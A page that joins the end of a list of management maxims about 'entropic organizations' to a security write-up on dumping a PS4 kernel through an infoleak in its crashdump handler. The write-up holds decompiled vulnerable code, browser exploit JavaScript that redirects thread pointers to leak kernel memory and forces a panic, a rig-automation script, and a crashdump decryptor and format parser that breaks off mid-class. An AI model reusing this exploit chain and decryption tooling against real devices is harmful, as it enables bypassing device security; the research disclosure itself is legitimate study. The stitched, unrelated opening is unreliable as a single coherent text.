20.  The Sith are right: rage propels. But the Jedi are right too: you must not let it control you. What nobody tells you is that the rage game is intrinsically tiring, and rage will take control as soon as you get too tired, so stop well before that point.

21.  Write down the situation, for your own understanding just as much as for the others’.

22.  If you feel like you don’t know what you are doing, it’s probably because you don’t know what you are doing, and that’s bad. Still, until you learn, you don’t really have much of an alternative. Just don’t let that feeling of desperation numb your ability to learn, which is exactly what it tends to do.

23.  There’s more and more good content to read and absorb on effective organizations. Don’t despair and don’t stop reading.

24.  Don’t let entropy get at your daily routine. Avoid entropy-driven work.

25.  Ask people questions to make sure they understand. Trust people who do the same to you. “Do you understand?” is NOT a valid question.

26.  Avoid having people waiting on you. Don’t create direct dependencies on your work or decisions, make sure people feel that they can take decisions and still stay true to the vision without referring to you (hence the importance of point 1).

27.  Take the time to coach people in depth. Really, spend time with the people who are or have the potential to be great professionals in the organisation.

28.  The time you spend with the people you see most potential in is endorsement enough. Avoid any other kind of endorsement of individuals. Unless you are leaving.

The Entropic Organization

29.  An organization populated by a majority of incompetents has less than zero net worth: it is able to destroy adjacent organizations that are not similarly populated.

30.  Incompetence is fiercely gregarious while knowledge is often fractious; the reason is that raw ideas transfer more easily through untrained minds than refined ideas transfer through trained minds. There is a reason why large organisations focus so much on simple messages; the pity is that difficult problems often have simple solutions that don’t work.

31.  Entropy self-selects. Hierarchical and other kinds of entropic organizations always favor solutions that survive within entropic organizations. Thus they will favor easy over simple, complex over difficult, responsibility-dilution over empowerment, accountability over learning, shock-therapy over culture-nurturing. This is the reinforcing loop that brings ever-increasing entropy into the system: entropy generates easy decisions with complex and broken implementations, which in turn generate more entropy. An example of an easy decision with a complexity-inducing implementation: the scenario “our company does not have a coherent strategy, so many projects deliver results that are not coherent, hampering the organic growth of our capabilities” will be answered with the classic knee-jerk decision-making pattern “we don’t know how to do X, so let’s overlay a new Y to enforce X”, in this case: “group strategic projects together into a big strategic program that will ensure coherence”. The difficult but simple option will not even be entertained: “let’s discover our real strategy and shape the organization around it.”

32.  Delivery dates often have irrelevant but very easy-to-understand impacts. Good and bad solutions have dramatic but very hard-to-understand impacts. The Entropic Organization will thus tend to make date-based decisions. It will always worry about the development organization’s ability to deliver by a given date, never about its ability to find the right solution. There are some very rare cases where the delivery date matters more than what you are delivering, but modern management seems to delight in generalizing this unusual occurrence to every situation. People do get promoted for delivering completely broken, useless and damaging solutions on time. If that is the measure of project success, you can expect dates to rule (even when they continuously slide). After all, if you are not a trained surgeon and the only thing you are told is that a given surgery should last no more than X hours, guess what the one criterion for all your actions during the operation will be. This shows the direct link between the constituents’ incompetence and the establishment of classic Entropic Organization decision-making.

33.  Having a strategy will only go so far when you face the Entropic Organization, since it will only be able to appropriate that strategy at the level of energy (understanding) it can attain, which, being entropic, is very low. The result does not look like a strategy at all: ever seen a two-year-old play air-traffic controller? He has grasped the basic idea of “talking to planes”, but that’s it.

34.  Partially isolating the Development Organization to stay effective does not work. Adapting your organization to be accepted by an incompetent background does not work either. What is left is radical isolation, backed by the attempt at radical results and crossed fingers for top-management recognition (also known as ‘Deus ex machina for the worthy’), or the top-down sales pitch (or POC) to the CEO (also known as “He who has the ear of the King…”). But don’t forget: nemo propheta in patria (no one is a prophet in their own land), so act and look like an outsider as long as you can.

35.  Growth-shrink symmetry. When an organization grows unhealthily (too fast, for bad reasons or through bad recruitment) it will also shrink unhealthily. When it grows it’s bold and confused, when it shrinks it’s scared and nasty.

36.  Most of the ideas that will pop up naturally from the Entropic Organization are bad in the context of modern knowledge-based work, but possess a superficial layer of common-sense to slide through. Exercise extreme prejudice.


DeepZip: Lossless Compression Using Recurrent Networks [pdf]

Dumping a PS4 Kernel in “Only” 6 Days


What if a secure device had an attacker-viewable crashdump format?
What if that same device allowed putting arbitrary memory into the crashdump?
Amazingly, the ps4 tempted fate by supporting both of these features!
Let’s see how that turned out…

The crash handling infrastructure of the ps4 kernel is interesting for 2 main reasons:

  • It is ps4-specific code (likely to be buggy)
  • If the crashdump can be decoded, we will gain very useful info for finding bugs and creating reliable exploits

On a normal FreeBSD system, a kernel panic will create a dump by calling kern_reboot with the RB_DUMP flag. This then leads to doadump being called, which will dump a rather tiny amount of information about the kernel image itself to some storage device.

On ps4, the replacement for doadump is mdbg_run_dump, which can be called from panic or directly from trap_fatal. The amount of information stored in the dump is gigantic by comparison - kernel state for all process, thread, and vm objects is included, along with some metadata about loaded libraries. The other obvious changes from the vanilla FreeBSD method are that mdbg_run_dump encodes the recorded data on a field-by-field basis and additionally encrypts the resulting buffer before finally storing it to disk.

Let’s zoom in to a special part of mdbg_run_dump - where it iterates over all process’ threads and tries to dump some pthread state:

void mdbg_run_dump(struct trapframe *frame)
{
    // ...
    for (p = allproc; p != NULL; p = cur_proc->p_list.le_next) {
        // ...
        for (td = p->p_threads.tqh_first; td != NULL; td = td->td_plist.tqe_next) {
            // ...
            mdbg_pthread_fill_thrinfo2(&dumpstate, td->td_proc,
                                       (void *)td->td_pcb->pcb_fsbase,
                                       sysdump__internal_call_readuser);
            // ...
        }
        // ...
    }
    // ...
}

void mdbg_pthread_fill_thrinfo2(void *dst, struct proc *p, void *fsbase,
                                int (*callback)(void *dst, struct proc *p, signed __int64 va, int len))
{
    struct pthread *tcb_thread; // [rsp+8h] [rbp-408h]
    u8 pthread[984];            // [rsp+10h] [rbp-400h]

    if (!callback(&tcb_thread, p, (signed __int64)fsbase + 0x10, 8) &&
        !callback(pthread, p, (signed __int64)tcb_thread, 984)) {
        *(_QWORD *)dst = *(_QWORD *)&pthread[0xA8];
        *((_QWORD *)dst + 1) = *(_QWORD *)&pthread[0xB0];
    }
}

int sysdump__internal_call_readuser(void *dst, struct proc *p, signed __int64 va, int len)
{
    const void *src;    // rsi
    struct vmspace *vm; // rcx
    int rv;             // rax
    vm_paddr_t kva;     // rax

    src = (const void *)va;
    if (va >= 0) {
        // if va is in userspace, get a kernel mapping of the address
        // (note "va" is treated as signed, here)
        vm = p->p_vmspace;
        rv = EFAULT;
        if (!vm)
            return rv;
        kva = pmap_extract(vm->vm_pmap, va);
        src = (const void *)(kva | -(signed __int64)(kva < 1) | 0xFFFFFE0000000000LL);
    }
    rv = EFAULT;
    if (src && src != (const void *)-1LL) {
        if (va < 0) {
            src = (const void *)va;
        } else {
            rv = ESRCH;
            if (!p)
                return rv;
        }
        // so, this can still be reached even if "va" is originally in kernel space!
        memcpy(dst, src, len);
        rv = 0LL;
    }
    return rv;
}

Above, dumpstate is a temporary buffer which will eventually make it into the crashdump. To summarize, sysdump__internal_call_readuser can be made to function as a read-anywhere oracle. This is because fsbase will point into our (owned) webkit process’ usermode address space. Thus, even without changing the actual fsbase value, we may freely change the value of tcb_thread, which is stored at fsbase + 0x10.
Further, sysdump__internal_call_readuser will happily read from a kernel address and put the result into the dump.
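
To make the leak arithmetic concrete, here is a minimal sketch of the layout the code above implies (the helper names are mine; the 600-thread and 16-byte figures come from the exploit JS later in the post): the dumper follows the pointer stored at fsbase + 0x10, treats it as a struct pthread, and copies the 16 bytes at offsets 0xA8/0xB0 into the dump, so storing (target - 0xA8) there leaks the 16 bytes at target.

# Sketch only: offsets (0x10, 0xA8, 0x10 bytes per thread) are taken from
# mdbg_pthread_fill_thrinfo2 above; 600 threads per cycle comes from the
# browser-side exploit code further down.
def fake_pthread_ptr(target_kva):
    # value to store at fsbase + 0x10 so that "pthread[0xA8..0xB8]" is
    # exactly the 16 bytes at target_kva
    return (target_kva - 0xA8) & 0xFFFFFFFFFFFFFFFF

def leak_plan(dump_base, num_threads=600):
    # thread index -> kernel address whose 16 bytes land in that thread's slot
    return {idx: dump_base + idx * 0x10 for idx in range(num_threads)}

plan = leak_plan(0xFFFFFFFF80000000)
print(hex(fake_pthread_ptr(plan[1])))   # 0xffffffff7fffff68, i.e. plan[1] - 0xa8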

We can now put any kernel location into the dump, but we still need to decrypt and decode it…
Aside from that, there’s also the issue that we may only add 0x10 bytes per thread in this manner…

The crazy news about the encryption of crashdumps isn’t just that they use symmetric encryption - they also tend to use the same keys between firmware versions! This meant that from firmware 1.01 until they somehow realized it was “probably a bad idea” to reuse symmetric keys which could be exposed if the kernel were dumped, only versioned_keys[1] was needed (see Appendix). After that point, crashdumps are still useful; however, you must dump the kernel once beforehand in order to obtain the keys.
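
For reference, the whole per-console key derivation (condensed here from the Decryptor.keygen routine in the Appendix; the function name below is mine) fits in a few lines. The only real secrets are the firmware-wide root keys kd and kc; the encrypted OpenPSID sits right in the dump header:

# Condensed from the Appendix Decryptor; not standalone tooling.
from Crypto.Cipher import AES
from Crypto.Hash import HMAC, SHA256

def derive_keyset(kd, kc, openpsid):
    # openpsid_enc is also what gets written into the dump's secure header
    openpsid_enc = AES.new(kd, AES.MODE_ECB).encrypt(openpsid)
    digest = HMAC.new(kc, msg=openpsid_enc, digestmod=SHA256).digest()
    hmac_key, aes_key = digest[:0x10], digest[0x10:]
    return hmac_key, aes_key    # AES-128-CBC key; the IV is all zeroes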

The crashdump encoding (which we know is called “nxdp” from the symbols present in firmware 1.01) is a simple run length encoding derivative, with a few primitive data types supported. A functional parser is at the end of the post (see Appendix).
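
To give a feel for how simple the container is, here is a standalone sketch of that run-length scheme, following the decode_blob_rle routine in the Appendix parser (0x97 is the escape byte; an escape with a count of zero stands for a literal 0x97):

def rle_decode(stream, out_len):
    # stream: raw blob_rle payload, after the decompressed length has been read
    assert stream[0] == 0x97            # leading 0x97 carries no data
    out, i = b'', 1
    while len(out) < out_len:
        b = stream[i]; i += 1
        if b == 0x97:
            count = stream[i]; i += 1
            if count == 0:              # escaped literal 0x97
                out += b'\x97'
            else:                       # next byte repeated `count` times
                out += bytes([stream[i]]) * count
                i += 1
        else:
            out += bytes([b])
    return out

# 0x97 | 'A' | 0x97 0x04 'B' | 'C'  ->  b'ABBBBC'
assert rle_decode(bytes([0x97, 0x41, 0x97, 0x04, 0x42, 0x43]), 6) == b'ABBBBC'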

This seems like quite a bit of effort for some 0x10 bytes per thread, doesn’t it? Wait - it gets better! During testing, I found that I could only make ~600 threads exist concurrently before the browser process would either crash, hang, or just refuse to make more threads. Some simple math:

full_dump_size = 32MB
crashdump_cycle_time = ~5 minutes
thread_per_crashdump_cycle = 600
per_dump_size = thread_per_crashdump_cycle * 0x10 bytes = 9600 bytes
(full_dump_size / per_dump_size) * crashdump_cycle_time = 11 days
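
As a sanity check on those figures (assuming decimal megabytes and a flat 5-minute cycle, so the exact answer hovers around the 11 days above):

full_dump_size = 32 * 1000 * 1000        # ~32MB of kernel to leak
per_dump_size = 600 * 0x10               # 600 threads x 16 bytes = 9600 bytes/cycle
cycles = full_dump_size / per_dump_size  # ~3333 panic/reboot cycles
days = cycles * 5 / (60 * 24)            # ~11.6 days at ~5 minutes per cycle
print(round(days, 1))                    # -> 11.6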

11 days… Eventually, I was able to cut the required time down to only 6 days by being a bit more intelligent in choosing which memory ranges to dump. Normally when dumping from software exploits one would just linearly dump as much as possible, which has the advantage of bringing in .bss and other areas which can be handy for static analysis.

With prerequisites for leaking the kernel out of crashdumps taken care of, I set about with automating the procedure such that I could just let it run without thinking about it and come back some days later to a shiny new kernel dump.

Since the ps4 kernel stores the crashdump to the hard drive, I needed a way to either intercept the data in-flight to the hard drive, or rig up some way to read from the hard drive between panic cycles. Conveniently, it was around this time that I heard about the work vpikhur had done on EAP. Details on the EAP hack are out of scope for this post (see his talk for more details), but suffice it to say that EAP is an embedded processor in the Aeolia southbridge, and vpikhur had figured out how to get persistent kernel-level code exec on it (:D). Using knowledge gained from this hack, I was provided with a replacement EAP kernel binary which would detect crashdumps on the hard drive and shoot them over the network to my PC.

With this capability, some small hardware modifications to connect my ps4’s power switch to the network, and simulated input to the ps4 via Linux’s USB gadget API, I was able to simply script the entire process (this code ran on my PC and spoke to a web server on a Novena (remote server) to control the ps4):

import requests, time
import socket
import parse_dump
import struct
from io import BytesIO
import sys, traceback

remote_server = 'novena ip'

def send_cmd(cmd):
    requests.get('http://%s' % (remote_server), headers={'remote-cmd': cmd})

def dump_index_get():
    with open('dump-index') as f:
        return int(f.read())
    return 0

def dump_index_set(index):
    print('setting dump-index to %i' % (index))
    with open('dump-index', 'w') as f:
        f.write('%i' % (index))

def dump_index_increment():
    index = dump_index_get()
    dump_index_set(index + 1)

def process_dump(partition_data):
    nxdp = parse_dump.NXDP(BytesIO(parse_dump.Decryptor(partition_data).data))
    # uses the most recent thread_info sent to the http server to transpose
    # the dump data into flat memory dumps
    nxdp.dump_thread_leak()

def recv_dump():
    sock = socket.socket()
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind(('', 1339))
        sock.listen(1)
        conn, addr = sock.accept()
        with conn:
            magic = struct.unpack('<L', conn.recv(4))[0]
            if magic != 0x13371337:
                print('bad magic')
            length, status = struct.unpack('<2L', conn.recv(4 * 2))
            if status != 0:
                print('bad status')
            data = b''
            while len(data) < length:
                data += conn.recv(0x8000)
            process_dump(data)
            dump_index_set(dump_index_get())

# turn on
send_cmd('power')

while True:
    # boot from healthy state takes ~30 seconds
    time.sleep(35)
    # going to browser should load exploit and crash ps4
    send_cmd('start-browser')
    # wait for exploit to run and ps4 to power off completely
    time.sleep(20)
    # power on ps4
    # it will go through fsck (~60secs) and boot to a "send error report?" screen.
    send_cmd('power')
    # power must be pressed twice...
    time.sleep(2)
    send_cmd('power')
    time.sleep(60)  # fsck
    time.sleep(35)  # power-up
    # go past "send error report?" screen...
    send_cmd('ack-crash')
    # wait for xmb to load
    time.sleep(10)
    # go to rest mode to let EAP do it's thing
    send_cmd('suspend')
    # wait for data to arrive and process it
    try:
        recv_dump()
        # after recving all data from EAP, need to wait for reboot (done on loop)
        # assuming EAP sent data OK, it will reboot by itself into healthy state
        dump_index_increment()
    except:
        # expect that nxdp data was recv'd, but decode fail -> just retry same
        # position
        exc_type, exc_value, exc_traceback = sys.exc_info()
        traceback.print_exception(exc_type, exc_value, exc_traceback)
        print('nxdp decode failed, retry')

Triggering the Vulnerability

In order to progressively dump the regions I wanted, I created a simple json schema to record metadata which could be used to tie TIDs to the kernel address which their portion of the crashdump would contain, as well as maintain the base address used per-run (getDumpIndex(), here). Below is the snippet of js executed in the ps4 browser process in order to initiate a crashdump:

...
// spawn threads which will just spin, and modify tcb->tcb_thread
// inf loop around nanosleep(30 secs)
var thread_map = [];
for (var thrcnt = 0; thrcnt < 600; thrcnt++) {
    var local_buf = scratchPtr.plus(0x2000);
    var rv = doCall(gadgets.pthread_create, local_buf, 0,
                    syms.libkernel.inf_loop_with_nanosleep, 0);
    var thread = read64(local_buf);
    var tcb = read64(thread.plus(0x1e0));
    var tid = read32(thread);
    thread_map.push({
        tcb_thread_ptr: tcb.plus(0x10),
        thr_idx: thrcnt,
        tid: tid
    });
}

// this was for back when there was no kernel .text aslr :)
var dump_base = new U64(0x80000000, 0xffffffff);
dump_base = dump_base.plus(600 * 0x10 * getDumpIndex());

// sync layout so dumped memory can be ordered correctly
sendThreadInfo(dump_base, thread_map);

// wait for threads to start - delayed start could overwrite tcb_thread
doCall(gadgets.sleep, 3);

// now set tcb_thread
dump_base = dump_base.minus(0xa8);
for (var i = 0; i < thread_map.length; i++) {
    // 0x10 bytes at each tcb_thread + 0xa8 will be added to dump
    var t = thread_map[i];
    var dumpaddr = dump_base.plus(t.thr_idx * 0x10);
    write64(t.tcb_thread_ptr, dumpaddr);
}

// panic (here, using namedobj bug to free invalid pointer)
kernel_free(toU64(0xdeadbeef));
return;
}

After a panic and crashdump would occur, the ps4 would reboot and go through its standard fsck procedure. My control script would then cause the ps4 to enter suspend mode, at which point the custom EAP kernel would take over and upload the crashdump to my PC. Once on the PC, the crashdump would be decrypted and parsed in order to extract the leaked 9600 bytes. Then, the process would start all over…for 6 days :)

On firmware ~4.50, the crashdump key generation method was finally changed to require knowledge of a private, asymmetric key in order to decrypt the dump contents.

// one of the first calls mdbg_run_dump makes
int sysdump_output_establish_secure_context_on_dump()
{
    int rv;                // eax
    u8 nonces_to_sign[32]; // [rsp+8h] [rbp-48h]

    // fill globals
    sysdump_rng_nonce3_128(nonce3);
    sysdump_rng_nonce4_128(nonce4);

    memcpy(nonces_to_sign, nonce3, 16LL);
    memcpy(&nonces_to_sign[16], nonce4, 16LL);
    rv = RsaesOaepEnc2048_Sha256(sysdump_rsa_n, sysdump_rsa_e, nonces_to_sign, 32, sysdump_rsa_enc_nonces);
    if (rv)
        bzero(sysdump_rsa_enc_nonces, 0x100uLL);
    Sha256HmacInit(sysdump_hmac_ctx, nonce4, 0x10u);
    bzero(dump_aes_ctx_iv, 0x10uLL);
    return rv;
}

The above version of sysdump_output_establish_secure_context_on_dump is from firmware 4.55. nonce3 is the value which will be used as the crashdump AES key. This value is only stored in the dump within an RSA encrypted blob. As such, a new approach would be needed to attempt key recovery.

This was probably the most convoluted and lengthy setup I’ve done for a bug which amounts to just an infoleak. But it was a fun experience.

Keep Hacking!

Crashdump Decryptor

'''
This decrypts a coredump stored on the "custom" swap partition.
The GPT UUID is B4 A5 A9 76 B0 44 2A 47 BD E3 31 07 47 2A DE E2
Look for "Decryptor.header_t" (see below)...
'''
from Crypto.Cipher import AES
from Crypto.Hash import HMAC, SHA256
import binascii, struct
from construct import *

def aes_ecb_encrypt(k, d):
    return AES.new(k, AES.MODE_ECB).encrypt(d)

def aes_ecb_decrypt(k, d):
    return AES.new(k, AES.MODE_ECB).decrypt(d)

def hmac_sha256(k, d):
    return HMAC.new(k, msg=d, digestmod=SHA256).digest()

def ZeroPadding(size):
    return Padding(size, strict=True)

class RootKeys:
    def __init__(s, kd, kc):
        s.kd = binascii.unhexlify(kd)
        s.kc = binascii.unhexlify(kc)

class Keyset:
    def __init__(s, hmac_key, aes_key):
        s.hmac_key, s.aes_key = hmac_key, aes_key
        s.iv = b'\0' * len(s.aes_key)

class Decryptor:
    DUMP_BLOCK_LEN = 0x4000
    versioned_keys = {
        1: [RootKeys('you', 'should')],
        2: [RootKeys('probably', 'find')],
        3: [RootKeys('these', 'your-'),  # 4.05
            RootKeys('self', ':)'),      # 4.07
        ]
    }
    secure_header_t = Struct('secure_header',
        # only seen version 1 so far
        ULInt32('version'),
        # Aes128Ecb(kd, openpsid)
        Bytes('openpsid_enc', 0x10),
        # 0x80 bytes of secure_header are hashed for the data_hmac,
        # but only 0x14 bytes (actual used bytes) are actually written to disk...
        ZeroPadding(0x80 - 0x14),
    )
    final_header_t = Struct('final_header',
        Bytes('unknown', 0x10),
        # 1 : unread dump present, 2 : no new dump data
        ULInt64('state'),
        ULInt64('data_len'),
        ZeroPadding(0x10),
        Bytes('data_hmac', 0x20))
    header_t = Struct('header',
        secure_header_t,
        ZeroPadding(0x100 - secure_header_t.sizeof()),
        final_header_t)

    def keygen(s, openpsid, root_keys):
        openpsid_enc = aes_ecb_encrypt(root_keys.kd, openpsid)
        digest = hmac_sha256(root_keys.kc, openpsid_enc)
        return Keyset(digest[:0x10], digest[0x10:])

    def hmac_verify(s, keyset):
        hmac = HMAC.new(keyset.hmac_key, digestmod=SHA256)
        with open(s.fpath, 'rb') as f:
            hmac.update(f.read(s.secure_header_t.sizeof()))
            data_len = s.header.final_header.data_len
            data_len -= s.DUMP_BLOCK_LEN
            f.seek(s.DUMP_BLOCK_LEN)
            hmac.update(f.read(data_len))
            return hmac.digest() == s.header.final_header.data_hmac
        return False

    def unwrap_keyset(s):
        openpsid_enc = s.header.secure_header.openpsid_enc
        version = s.header.secure_header.version
        for root_keys in s.versioned_keys[version]:
            openpsid = aes_ecb_decrypt(root_keys.kd, openpsid_enc)
            digest = hmac_sha256(root_keys.kc, openpsid_enc)
            keyset = Keyset(digest[:0x10], digest[0x10:])
            if s.hmac_verify(keyset):
                print('OpenPSID:\n%s' % (binascii.hexlify(openpsid)))
                return keyset
        return None

    def __init__(s, fpath, default_openpsid=None, default_keyset_id=None):
        s.fpath = fpath
        with open(s.fpath, 'rb') as f:
            s.header = s.header_t.parse_stream(f)
        if s.header.final_header.state == 1:
            s.keyset = s.unwrap_keyset()
        else:
            # something happened to the dump (like it was "consumed" after a reboot).
            # in that case most of the header will be zerod
            assert default_openpsid is not None, 'must provide openpsid to decrypt dump without secure_header'
            assert default_keyset_id is not None, 'must provide keyset id to decrypt dump without secure_header'
            root_keys = s.versioned_keys[default_keyset_id[0]][default_keyset_id[1]]
            s.keyset = s.keygen(default_openpsid, root_keys)
        assert s.keyset is not None
        # just decrypt it all at once for now
        # if we reach here, hmac is already verified or it didn't exist
        with open(s.fpath, 'rb') as f:
            f.seek(s.DUMP_BLOCK_LEN)
            data_enc = f.read()
        # This should actually be AesCbcCfb128Encrypt,
        # but it's always block-size multiple in crashdump usage.
        s.data = AES.new(s.keyset.aes_key, AES.MODE_CBC, s.keyset.iv).decrypt(data_enc)
        '''
        with open('debug.bin', 'wb') as fo:
            fo.write(s.data)
        #'''

NXDP Decoder

import binascii, struct
from construct import *
from io import BytesIO
import argparse

def sign_extend(value, bits):
    sign_bit = 1 << (bits - 1)
    return (value & (sign_bit - 1)) - (value & sign_bit)

class NxdpObject(object):
    def __init__(s, obj):
        s.parse(obj)

    def parse(s, o):
        s.obj = o

    def __repr__(s):
        stuff = ['Unformatted Object:']
        for i in s.obj:
            if isinstance(i, int):
                stuff.append('%16x' % (i))
            elif isinstance(i, bytes):
                stuff.append(str(binascii.hexlify(i)))
            else:
                stuff.append(repr(i))
        return '\n'.join(stuff)

class NxdpKernelInfo(NxdpObject):
    kernel_version_t = Struct('kernel_version',
        ULInt32('field_0'),
        ULInt32('firmware_version'),
        ULInt64('mdbg_kernel_build_id'),
        ZeroPadding(0x20 - 0x10))

    def parse(s, o):
        s.ver = s.kernel_version_t.parse(o[0])

    def __repr__(s):
        fw_ver_maj = s.ver.firmware_version >> 24
        fw_ver_min = (s.ver.firmware_version >> 12) & 0xfff
        fw_ver_unk = s.ver.firmware_version & 0xfff
        fw_ver = '%02x.%03x.%03x' % (fw_ver_maj, fw_ver_min, fw_ver_unk)
        l = []
        l.append('Kernel Version Info')
        l.append('  unk %8x' % (s.ver.field_0))
        l.append('  fw version %s' % (fw_ver))
        l.append('  kernel build id %16x' % (s.ver.mdbg_kernel_build_id))
        return '\n'.join(l)

class NxdpBuffer(NxdpObject):
    class Buffer:
        def __init__(s, va, buf):
            s.va = va
            s.buf = buf

    def parse(s, o):
        # seems to be generic; has subtype (1 : ascii string, 2 : raw bytes)
        # raw bytes are an array of <virtual address, bytes> pairs
        s.buftype = o[0]
        if s.buftype == 1:
            s.strbuf = o[1].decode('ascii')
        elif s.buftype == 2:
            s.bufs = []
            for va, size, buf in o[1]:
                assert size == len(buf)
                s.bufs.append(s.Buffer(va, buf))
        elif s.buftype == 3:
            s.buf = o[1]
        else:
            assert False

    def __repr__(s):
        l = []
        l.append('---------buffer begin-------')
        if s.buftype == 1:
            l.append(s.strbuf)
        elif s.buftype == 2:
            for buf in s.bufs:
                l.append('Virtual Address: %16x, Length %x' % (buf.va, len(buf.buf)))
                # TODO pretty-hexdump
                # normally used for stacks...should pretty-print stacks too
                l.append(str(binascii.hexlify(buf.buf), 'ascii'))
        elif s.buftype == 3:
            l.append('Kernel panic summary:')
            l.append(str(binascii.hexlify(s.buf), 'ascii'))
        l.append('---------buffer end---------')
        return '\n'.join(l)

class NxdpKernelPanic(NxdpObject):
    def parse(s, o):
        s.panicstr = o[0].decode('ascii').rstrip('\n')

    def __repr__(s):
        return 'Panic Message:\n%s' % (s.panicstr)

class NxdpKernelPanicLarge(NxdpObject):
    def parse(s, o):
        s.panicstr = o[0].decode('ascii') + o[1].decode('ascii')
        s.unks = o[2:]

    def __repr__(s):
        l = ['Panic Message(ver2):']
        l.append('  unk %x%x%x' % (s.unks[0], s.unks[1], s.unks[2]))
        l.append('  log: %s' % (s.panicstr))
        return '\n'.join(l)

class NxdpKernelTrapFrame(NxdpObject):
    reg_indices = ['rax', 'rcx', 'rdx', 'rbx', 'rsp', 'rbp', 'rsi', 'rdi',
                   'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15',
                   'rip', 'rflags']

    def parse(s, o):
        s.trapno = o[0]
        s.err = o[1]
        s.addr = o[2]
        s.regs = []
        for idx, val in o[3]:
            s.regs.append((idx, val))

    def __repr__(s):
        l = ['Trap Frame']
        l.append('  trapno %x' % (s.trapno))
        l.append('  err %x' % (s.err))
        l.append('  addr %16x' % (s.addr))
        for reg in s.regs:
            l.append('  %6s : %16x' % (s.reg_indices[reg[0]], reg[1]))
        return '\n'.join(l)

class NxdpDumperInfo(NxdpObject):
    def parse(s, o):
        s.unk = o[0]
        s.tid = o[1]

    def __repr__(s):
        l = ['Dumper Info']
        l.append('  unk %x' % (s.unk))
        l.append('  tid %x' % (s.tid))
        return '\n'.join(l)

class NxdpProcessInfo(NxdpObject):
    def parse(s, o):
        s.pid = o[0]
        s.subtypes = []
        s.subobjs = []
        for i in o[1]:
            if i[0] not in s.subtypes:
                s.subtypes.append(i[0])
            s.subobjs.append(NxdpParser.parse(i))

    def __repr__(s):
        l = ['', 'Process Info']
        l.append('  pid %x' % (s.pid))
        l.append('  subtypes seen %s' % (s.subtypes))
        for subobj in s.subobjs:
            l.append(str(subobj))
        return '\n'.join(l)

class NxdpSceDynlibInfo(NxdpObject):
    dynlib_info_t = Struct('dynlib_info',
        ULInt64('some_tid'),
        ULInt8('flags'),
        ZeroPadding(7),
        ULInt64('ppid'),
        String('comm', 0x20, encoding='ascii', padchar='\0'),
        String('path', 0x400, encoding='ascii', padchar='\0'),
        Bytes('fingerprint', 0x14),
        ULInt64('entrypoint'),
        ULInt64('field_454'),
        ULInt64('field_45c'),
        ULInt32('field_464'),
        ULInt32('field_468'),
        ULInt32('field_46c'),
        ULInt64('field_470'),
        ULInt32('p_sig'),
        ULInt32('field_47c'),
        # XXX it seems at some point, this field was added...
        ULInt32('field_480'),
    )

    def parse(s, o):
        if len(o[0]) != s.dynlib_info_t.sizeof():
            print('unexpected dynlib info size, %x' % (len(o[0])))
        s.info = s.dynlib_info_t.parse(o[0])

    def __repr__(s):
        l = ['Library Info']
        l.append('  some tid %x' % (s.info.some_tid))
        l.append('  flags %x' % (s.info.flags))
        l.append('  parent pid %x' % (s.info.ppid))
        l.append('  comm %s' % (s.info.comm))
        l.append('  path %s' % (s.info.path))
        l.append('  fingerprint %s' % (binascii.hexlify(s.info.fingerprint)))
        l.append('  entrypoint %16x' % (s.info.entrypoint))
        l.append('  unks (dynlib) field_454 %16x field_45c %16x field_464 %8x field_468 %8x' % (
            s.info.field_454, s.info.field_45c, s.info.field_464, s.info.field_468))
        l.append('  p_sig %8x' % (s.info.p_sig))
        l.append('  unks (proc)   field_46c %8x field_470 %16x field_47c %8x field_480 %8x' % (
            s.info.field_46c, s.info.field_470, s.info.field_47c, s.info.field_480))
        return '\n'.join(l)

class NxdpPcb(NxdpObject):
    # there are more (see struct pcb), but these are what we expect in the dump
    reg_indices = {
        59: 'fsbase',
        60: 'rbx',
        61: 'rsp',
        62: 'rbp',
        63: 'r12',
        64: 'r13',
        65: 'r14',
        66: 'r15',
        67: 'rip',
    }
    envxmm_t = Struct('envxmm',
        ULInt16('en_cw'),
        ULInt16('en_sw'),
        ULInt8('en_tw'),
        ULInt8('en_zero'),
        ULInt16('en_opcode'),
        ULInt64('en_rip'),
        ULInt64('en_rdp'),
        ULInt32('en_mxcsr'),
        ULInt32('en_mxcsr_mask'),
    )
    sv_fp_t = Struct('sv_fp',
        Bytes('fp_acc', 10),
        # TODO why is this nonzero?
        #Padding(6),
        Bytes('sbz', 6),
    )
    savefpu_xstate_t = Struct('savefpu_xstate',
        ULInt64('xstate_bv'),
        #Bytes('xstate_rsrv0', 16),
        ZeroPadding(16),
        #Bytes('xstate_rsrv', 40),
        ZeroPadding(40),
        Array(16, Bytes('ymm_bytes', 16)))
    savefpu_ymm_t = Struct('savefpu_ymm',
        envxmm_t,
        Array(8, sv_fp_t),
        Array(16, Bytes('xmm_bytes', 16)),
        # TODO why is this nonzero?
        #ZeroPadding(96),
        Bytes('sbz', 96),
        savefpu_xstate_t)

    def parse(s, o):
        s.flags = o[0]
        s.fpu = s.savefpu_ymm_t.parse(o[1])
        s.regs = []
        for idx, val in o[2]:
            s.regs.append((idx, val))

    def __repr__(s):
        l = ['Process Control Block']
        l.append('  flags %x' % (s.flags))
        l.append('  fpu state %s' % (s.fpu))
        for reg in s.regs:
            l.append('  %s : %16x' % (s.reg_indices[reg[0]], reg[1]))
        return '\n'.join(l)

class NxdpProcessThread(NxdpObject):
    def parse(s, o):
        s.tid = o[0]
        s.subobjs = []
        for i in o[1]:
            s.subobjs.append(NxdpParser.parse(i))

    def __repr__(s):
        l = ['Thread Info']
        l.append('  tid %x' % (s.tid))
        for subobj in s.subobjs:
            l.append(str(subobj))
        return '\n'.join(l)

class NxdpThreadInfo(NxdpObject):
    thread_info_t = Struct('thread_info',
        ULInt64('pthread_a8'),
        ULInt64('pthread_b0'),
        ULInt64('field_10'),
        ULInt64('td_priority'),
        ULInt64('td_oncpu'),
        ULInt64('td_lastcpu'),
        # if !td_wchan, then thread->field_458
        ULInt64('td_wchan'),
        ULInt32('field_38'),
        ULInt32('td_state'),
        ULInt32('td_inhibitors'),
        String('td_wmesg', 0x20, encoding='ascii', padchar='\0'),
        String('td_name', 0x20, encoding='ascii', padchar='\0'),
        ULInt32('pid'),
        ULInt64('td_field_450'),
        ULInt32('td_cpuset'),
        # XXX this struct size has been changed...
        Bytes('newstuff', 0xbc - 0x94))

    def parse(s, o):
        s.info = s.thread_info_t.parse(o[0])

    def __repr__(s):
        return str(s.info)

class NxdpTitleInfo(NxdpObject):
    # this is a new object, so the meanings are a guess
    def parse(s, o):
